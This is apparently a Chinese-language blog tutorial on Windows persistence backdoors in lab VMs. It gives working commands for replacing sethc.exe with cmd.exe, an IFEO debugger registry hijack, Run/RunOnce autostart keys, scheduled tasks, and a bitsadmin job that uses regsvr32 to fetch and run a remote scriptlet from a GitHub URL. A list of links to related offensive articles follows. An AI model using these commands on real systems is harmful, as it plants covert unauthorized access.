Windows持續化後門

原創 小晓晓晓林 2020-06-22 01:27

Windows權限維持

環境:Win10、Win7、Winxp虛擬機等

 

0x01 shift後門

windows中有一些輔助功能,能在用戶未登錄系統之前可以通過組合鍵來啓動它,類似的輔助功能有:

C:\Windows\System32\sethc.exe 粘滯鍵,啓動快捷鍵:按五次shift鍵

C:\Windows\System32\utilman.exe 設置中心,啓動快捷鍵:Windows+U鍵

通過替換成cmd.exe的方法達到快捷鍵啓動cmd的目的

shift連按五次

 

 

0x02 映像劫持IFEO

跟shift後門差不多,只不過在低版本的windows中,可以簡單的替換程序,而在高版本中替換的文件受到了系統的保護

在註冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option下添加一個項sethc.exe,然後在sethc.exe這個項中添加debugger鍵,鍵值爲惡意程序的路徑

也可以直接

reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setch.exe" /v debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"

此時打開sethc.exe會打開cmd.exe

 

0x03 註冊表自啓動項

自啓動項有兩個鍵:Run和RunOnce

Run:該項下的鍵值即爲開機啓動項,每一次開機啓動

RunOnce:鍵值只作用一次,執行完畢後就會自動刪除

常見註冊表啓動項鍵的位置:

用戶級

\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

系統級

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce

此時開機登錄就會自啓cmd

 

4、定時任務

windows下定時任務的命令有兩個分別是:at和schtasks

at:在win7、08等高版本的windows中不能將任務在前臺執行,只會後臺運行

schtasks:將定時的任務在前臺執行

at 15:39 calc.exe

時間儘量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑

schtasks /create /tn test /tr calc.exe /sc minute /mo 1

tn:任務名字

tr:程序名字

sc minute /mo 1:每隔一分鐘運行一次calc.exe

 

0x05 bits

Bitsadmin從win7之後操作系統就默認包含,可以用來創建上傳或者下載任務。

Bistadmin可以指定下載成功之後要進行什麼命令。

 

bitsadmin /create [type] DisplayName //創建一個任務

bitsadmin /cancel <Job> //刪除一個任務

bitsadmin /list /allusers /verbose //列出所有任務

bitsadmin /AddFile <Job> <RemoteURL> <LocalName> //給任務test添加一個下載文件

bitsadmin /SetNotifyCmdLine <Job> <ProgramName> [ProgramParameters] //設置在任務完成傳輸時或任務進入狀態時將運行的命令行命令

bitsadmin /Resume <Job> //激活傳輸隊列中的新任務或掛起的任務

bitsadmin /cancel <Job> //刪除某個任務

bitsadmin /reset /allusers //刪除所有任務

bitsadmin /complete <Job> //完成某個任務

 

創建任務

bitsamdin /create backdoor

添加文檔

bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe

設置下載成功後要執行的命令

bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"

執行任務

bitsadmin /Resume backdoor

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

內網滲透 -- 獲取內網中其他主機權限

  每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。 ----  網易雲熱評 環境:小攻:Kali 2020,ip:192.168.1.133           小受:win7 x86,ip

web安全工具库 2020-07-05 13:24:00

【Android編程】android平臺的MITM瑞士軍刀_cSploit(dSploit)項目移植_源碼解析以及中間人攻擊復現

/文章作者:Kali_MG1937 作者博客ID:ALDYS4 QQ:3496925334 未經允許,禁止轉載/ 何爲MITM欺騙,顧名思義,中間人攻擊的含義即爲在局域網中充當數據包交換中間人的角色 這樣就可以自由攔截和查看,甚至

MG1937 2020-07-04 07:10:56

使用python的scapy模塊掃描內網主機存活

話不多說我們直接上代碼 from scapy.all import * ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.43.0/24")/"t

呆呆呆了丢 2020-07-04 05:36:55

內網滲透 -- 獲取內網瀏覽器歷史記錄等相關信息

“我喜歡你,做我女朋友可以嗎?” 電話的那頭沒有反應,男生沉不住氣了, 小心翼翼地問着,“你在幹嘛呀?” “我在點頭。” ----  網易雲熱評   環境:小攻:Kali 2020,ip:192.168.1.133           小

web安全工具库 2020-07-02 02:11:48

PTH橫向移動

0x01 簡介 PTH全稱“pass the hash”,即hash傳遞。PTH通過smb服務進行,走445端口。 0x02 通過PTH橫向移動 一、通過cobaltstrike進行PTH 1、在已上線機器中直接dir訪問目標系

`GGyao 2020-07-01 01:34:34

mailsniper.ps1使用

下載地址:mailsniper 0x01 mailsniper.ps1獲取outlook所有聯繫人(爲爆破收集郵箱) 在域環境內(域內機器即可)執行命令: powershell -exec bypass Import-Modul

`GGyao 2020-07-01 01:34:21

Linux kali內網滲透之MSF生成Trojan直取系統權限

提示:本文章內所有內容環境爲自己搭建絕無違法內容,請不要利用其中的技術來做違法的事情。 工具介紹 Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasp

Pythonicc 2020-06-24 19:13:45

Linux kali內網滲透之DNS劫持+SET社會工程學進行內網釣魚攻擊

提示:本文章內所有內容環境爲自己搭建絕無違法內容,請不要利用其中的技術來做違法的事情。若本文顯示圖片違規,請點擊鏈接https://mp.weixin.qq.com/s/ZnrPjDJ2Wh1pqKEKCVaG-w跳轉至微信公衆號

Pythonicc 2020-06-24 19:13:45

Linux kali內網滲透之ARP斷網攻擊

Linux kali內網滲透之ARP斷網攻擊 ARP斷網攻擊 如果你的kali是虛擬機 ,請將其設置爲網絡橋接模式,這樣才和內網在同一網段 如果你的kali裏沒有安裝arpspoof,請在終端輸入如下命令進行安裝 apt-get

Pythonicc 2020-06-24 19:13:45

Cobalt Strike 簡單使用

Cobalt Strike 簡單使用 我在最沒有能力的年紀,碰見了最想照顧一生的人。 概述: Cobalt Strike是一款內網滲透測試神器,一個服務端,多個客戶端,這樣最大好處就是可以團隊合作。Cobalt Strike

SoulCat. 2020-06-24 10:08:20

內網滲透之小試牛刀

內網滲透之小試牛刀 離你最近的地方,路途最遠。 文章目錄內網滲透之小試牛刀思路:獲取權限:準備工作:內網蒐集:橫向滲透:拿下域控: 思路: 獲取服務器權限->進入內網->判斷是否在域中->信息收集(定位域控、域主機、域用戶

SoulCat. 2020-06-24 10:08:20

內網滲透-信息收集之本機收集(命令、工具及腳本)

後滲透攻防: https://www.secpulse.com/archives/51527.html https://3gstudent.github.io/ 目錄 一、內網信息收集 1.內網基礎信息: 2.內網核心業務信息

nilwiaoglwigjwlg 2020-06-24 03:49:10

Metasploit中配置beef

Metasploit中配置beef cd /usr/share/beef-xss/ 打開beef-XSS目錄下config.yaml文件leafpad config.yaml 修改metasploit的false爲true 繼續打開

MickeyMouse1928 2020-06-24 00:17:35

針對IIS6.0 WebDAV漏洞(cve-2017-7269)製作純字符數字的shellcode回連msf

環境: Kali攻擊機1 IP:192.168.114.140 Win7攻擊機2 IP(安裝gcc和python2.7):192.168.114.130 Windows server 2003目標主機(開啓webdev服務):192.16

MickeyMouse1928 2020-06-24 00:17:35

利用nc反彈shell實驗

反彈shell 反彈shell(reverse shell),就是控制端監聽在某TCP/UDP端口,被控端發起請求到該端口,並將其命令行的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本

一个蝙蝠的故事 2020-06-22 16:01:21